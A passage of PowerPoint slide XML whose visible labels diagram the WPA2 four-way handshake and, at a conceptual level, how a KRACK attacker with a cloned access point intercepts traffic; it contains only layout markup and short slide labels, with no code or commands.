        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="686" name="Picture 685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D97BB5F5-3C22-47E8-96AB-217D439B4AC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5129053" y="3669455"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="687" name="Picture 686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F5A89D6B-8BDC-4502-8CAA-3C2551AA973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9166924" y="4457327"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="688" name="Picture 687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1D99913A-E76A-40F2-BE71-52D0CE43D8C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3256003" y="2838306"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="689" name="Picture 688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D3490219-25FE-4E18-80A9-53C7A0AB496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5858460" y="3396939"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="690" name="Picture 689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2CF0F1EB-7DE7-41FA-8B86-FC83098AC6C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6827674" y="4987669"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="691" name="Picture 690" descr="A picture containing bridge&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AC1525F-A4B8-4AFE-8461-26A2334EA66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1021"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7984557" y="4795390"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="692" name="Picture 691" descr="A close up of a logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7AEE9BA-38E7-4316-9B6F-DF9D947A0F3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42823" y="4301027"/>
              <a:ext cx="1117716" cy="106289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0370990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Rectangle 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B00302A-8F44-4376-AD52-BCFF3A7AFBBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="801746" y="1439754"/>
            <a:ext cx="4560829" cy="1431778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prstClr val="white"/>
              </a:solidFill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734A113F-4FF8-4C4F-9253-D564CA76F134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798623" y="3080637"/>
            <a:ext cx="4560829" cy="1431778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prstClr val="white"/>
              </a:solidFill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F1503B4-55EF-4DAD-A68D-63144646E9F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798623" y="4723901"/>
            <a:ext cx="4560829" cy="1431778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prstClr val="white"/>
              </a:solidFill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4EADC72E-F82D-4E4E-8404-509F1E39326D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132417" y="994371"/>
            <a:ext cx="7059582" cy="5558580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/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7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Title 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F06FD1-D786-455F-BD73-FED5FC0A7FFB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866900" y="158750"/>
            <a:ext cx="8458200" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3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Key Reinstallation Attack (KRACK)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7404992" y="1265025"/>
            <a:ext cx="2295115" cy="307777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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WPA2 4-Way Handshake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D62C901-0E02-4173-9415-82D3F9B1486F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5273054" y="1532226"/>
            <a:ext cx="6760018" cy="1601380"/>
            <a:chOff x="4921542" y="1462554"/>
            <a:chExt cx="6760018" cy="1601380"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="Picture 40" descr="D:\Icons\CLEAN\Networking\access_point_256.pn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4107" y="1686541"/>
              <a:ext cx="922657" cy="92265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42" name="Straight Arrow Connector 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5942667" y="1778107"/>
              <a:ext cx="2921688" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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Arrow Connector 42"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5942667" y="2028879"/>
              <a:ext cx="2921688" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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Arrow Connector 43"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5942667" y="2279651"/>
              <a:ext cx="2921688" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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Arrow Connector 44"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5942667" y="2530424"/>
              <a:ext cx="2921688" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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TextBox 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8888940" y="2437930"/>
              <a:ext cx="1037424" cy="276999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EEECE1">
                      <a:lumMod val="1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Access Point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4921542" y="2602269"/>
              <a:ext cx="1147624" cy="461665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EEECE1">
                      <a:lumMod val="1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Android/Linux User</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="Picture 47" descr="X:\Web2.0 PNG Icons\Globe1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825770" y="1719974"/>
              <a:ext cx="855790" cy="8557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0" name="Rectangle 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10902191" y="2573526"/>
              <a:ext cx="702949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EEECE1">
                      <a:lumMod val="1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Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="51" name="Straight Arrow Connector 50"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9737397" y="2147869"/>
              <a:ext cx="1124779" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050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Rectangle 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6812240" y="1538943"/>
              <a:ext cx="1378904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EEECE1">
                      <a:lumMod val="1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Message 1 (ANonce)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6638338" y="1797440"/>
              <a:ext cx="1784463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EEECE1">
                      <a:lumMod val="1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Message 2 (Signed SNonce)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Rectangle 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6397484" y="2052750"/>
              <a:ext cx="2012055" cy="430887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr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EEECE1">
                      <a:lumMod val="1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Message 3 (Signed ANonce, Encryption Key Installation)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Rectangle 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6522861" y="2496736"/>
              <a:ext cx="2018501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EEECE1">
                      <a:lumMod val="1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Message 4 (Acknowledgement)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="Picture 55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60418" y="2175581"/>
              <a:ext cx="220766" cy="220766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Picture 56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036536" y="1937782"/>
              <a:ext cx="220766" cy="220766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="58" name="Picture 57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036536" y="2426941"/>
              <a:ext cx="220766" cy="220766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="59" name="Picture 58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60418" y="1657441"/>
              <a:ext cx="220766" cy="220766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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78767EEE-2B2D-4037-8C0C-8E118AC33516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51261" y="1462554"/>
              <a:ext cx="888187" cy="1134803"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6573930" y="3280752"/>
            <a:ext cx="3957238" cy="307777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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>KRACK Attack on WPA2 4-Way Handshake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7990B180-C393-4B77-BC4D-9ECE1A3F9239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5042495" y="3548328"/>
            <a:ext cx="6990435" cy="2823333"/>
            <a:chOff x="4690983" y="3548328"/>
            <a:chExt cx="6990435" cy="2823333"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 2" descr="D:\Icons\CLEAN\Networking\access_point_256.pn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136294" y="3839528"/>
              <a:ext cx="922350" cy="9223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4" name="Straight Arrow Connector 3"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6175839" y="3931064"/>
              <a:ext cx="2920716" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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" name="Group 6"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7318361" y="5223427"/>
              <a:ext cx="827063" cy="827063"/>
              <a:chOff x="5543425" y="3979797"/>
              <a:chExt cx="859535" cy="859536"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="Picture 5" descr="C:\Users\PGB\Desktop\1310391547_virus.png"/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38171" y="3992793"/>
                <a:ext cx="470055" cy="47005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9" name="Picture 4" descr="C:\Users\ADMINI~1\AppData\Local\Temp\SNAGHTML13bf56f.PNG"/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43425" y="3979797"/>
                <a:ext cx="859535" cy="8595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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6175839" y="4181753"/>
              <a:ext cx="2920716" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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Arrow Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7242574" y="4432441"/>
              <a:ext cx="1853981" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6175839" y="4683131"/>
              <a:ext cx="2920716" cy="589"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9121132" y="4590622"/>
              <a:ext cx="1037079" cy="276999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EEECE1">
                      <a:lumMod val="1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Access Point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6772767" y="5909996"/>
              <a:ext cx="1536534" cy="461665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EEECE1">
                      <a:lumMod val="1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Attacker with cloned access point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 47" descr="X:\Web2.0 PNG Icons\Globe1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825913" y="3872951"/>
              <a:ext cx="855505" cy="85550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20" name="Straight Arrow Connector 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10006694" y="4300703"/>
              <a:ext cx="844782" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050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Arrow Connector 65"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="5941653" y="4891428"/>
              <a:ext cx="1019101" cy="777240"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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Arrow Connector 69"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="8417030" y="4525717"/>
              <a:ext cx="928548" cy="1599217"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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3" name="Picture 22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53679" y="4328406"/>
              <a:ext cx="220692" cy="220692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 23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269676" y="4090686"/>
              <a:ext cx="220692" cy="220692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 24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269676" y="4579683"/>
              <a:ext cx="220692" cy="220692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25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53679" y="3810438"/>
              <a:ext cx="220692" cy="220692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7045123" y="3691937"/>
              <a:ext cx="1378904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EEECE1">
                      <a:lumMod val="1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Message 1 (ANonce)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6871278" y="3950347"/>
              <a:ext cx="1784463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EEECE1">
                      <a:lumMod val="1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Message 2 (Signed SNonce)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Arrow Connector 23"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="6303133" y="4309433"/>
              <a:ext cx="705532" cy="960120"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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0" name="Picture 46" descr="E:\haja Premium\Rejection.png"/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5368" y="4325269"/>
              <a:ext cx="212031" cy="21203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2" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7153767" y="4714988"/>
              <a:ext cx="1351022" cy="43088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EEECE1">
                      <a:lumMod val="1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Attacker intercepts the traffic</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10902191" y="4726217"/>
              <a:ext cx="702949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EEECE1">
                      <a:lumMod val="1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Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4690983" y="5248225"/>
              <a:ext cx="1373804" cy="600164"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr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EEECE1">
                      <a:lumMod val="1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Packet will travel through attacker’s cloned access point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8169375" y="5190598"/>
              <a:ext cx="1511184" cy="600164"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr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EEECE1">
                      <a:lumMod val="1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Attacker can now read all the packets that the victim sends</a:t>
              </a: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94B07818-48E8-4572-990C-9863D9EEC522}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7196195" y="4233435"/>
              <a:ext cx="1837961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EEECE1">
                      <a:lumMod val="1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Message 3 (Signed ANonce, Encryption Key Installation)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2C3800D9-1312-4B78-B4A0-2B73256591CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4897151" y="4664924"/>
              <a:ext cx="1147624" cy="461665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EEECE1">
                      <a:lumMod val="1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Android/Linux User</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="68" name="Picture 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B865B99B-629F-4127-ABD6-70E043C819D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262643" y="3548328"/>
              <a:ext cx="888187" cy="1134803"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70" name="Picture 69" descr="A close up of a logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60013926-BA36-42E2-BFB4-462267800D8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857392" y="5160543"/>
              <a:ext cx="607960" cy="782375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A70E4A40-345C-4828-A77A-3C73755CD39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="150176" y="3504304"/>
            <a:ext cx="584445" cy="584445"/>
            <a:chOff x="3322001" y="3504304"/>
            <a:chExt cx="584445" cy="584445"/>
          </a:xfrm>
        </p:grpSpPr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81EA30CB-603F-4766-8168-F1FFF4DE3256}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3322001" y="3504304"/>
              <a:ext cx="584445" cy="584445"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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" name="Freeform 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D39FD8-E965-431B-A707-CC068F20D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501" y="3705355"/>
              <a:ext cx="325444" cy="182342"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112144 w 497"/>
                <a:gd name="T1" fmla="*/ 0 h 276"/>
                <a:gd name="T2" fmla="*/ 112144 w 497"/>
                <a:gd name="T3" fmla="*/ 0 h 276"/>
                <a:gd name="T4" fmla="*/ 0 w 497"/>
                <a:gd name="T5" fmla="*/ 60435 h 276"/>
                <a:gd name="T6" fmla="*/ 112144 w 497"/>
                <a:gd name="T7" fmla="*/ 124959 h 276"/>
                <a:gd name="T8" fmla="*/ 223387 w 497"/>
                <a:gd name="T9" fmla="*/ 60435 h 276"/>
                <a:gd name="T10" fmla="*/ 112144 w 497"/>
                <a:gd name="T11" fmla="*/ 0 h 276"/>
                <a:gd name="T12" fmla="*/ 112144 w 497"/>
                <a:gd name="T13" fmla="*/ 108600 h 276"/>
                <a:gd name="T14" fmla="*/ 112144 w 497"/>
                <a:gd name="T15" fmla="*/ 108600 h 276"/>
                <a:gd name="T16" fmla="*/ 63953 w 497"/>
                <a:gd name="T17" fmla="*/ 60435 h 276"/>
                <a:gd name="T18" fmla="*/ 112144 w 497"/>
                <a:gd name="T19" fmla="*/ 11814 h 276"/>
                <a:gd name="T20" fmla="*/ 159884 w 497"/>
                <a:gd name="T21" fmla="*/ 60435 h 276"/>
                <a:gd name="T22" fmla="*/ 112144 w 497"/>
                <a:gd name="T23" fmla="*/ 108600 h 276"/>
                <a:gd name="T24" fmla="*/ 112144 w 497"/>
                <a:gd name="T25" fmla="*/ 60435 h 276"/>
                <a:gd name="T26" fmla="*/ 112144 w 497"/>
                <a:gd name="T27" fmla="*/ 60435 h 276"/>
                <a:gd name="T28" fmla="*/ 112144 w 497"/>
                <a:gd name="T29" fmla="*/ 35897 h 276"/>
                <a:gd name="T30" fmla="*/ 87823 w 497"/>
                <a:gd name="T31" fmla="*/ 60435 h 276"/>
                <a:gd name="T32" fmla="*/ 112144 w 497"/>
                <a:gd name="T33" fmla="*/ 84517 h 276"/>
                <a:gd name="T34" fmla="*/ 136014 w 497"/>
                <a:gd name="T35" fmla="*/ 60435 h 276"/>
                <a:gd name="T36" fmla="*/ 112144 w 497"/>
                <a:gd name="T37" fmla="*/ 60435 h 2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97" h="276">
                  <a:moveTo>
                    <a:pt x="249" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="249" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="0"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="151"/>
                    <a:pt x="89" y="275"/>
                    <a:pt x="249" y="275"/>
                  </a:cubicBezTo>
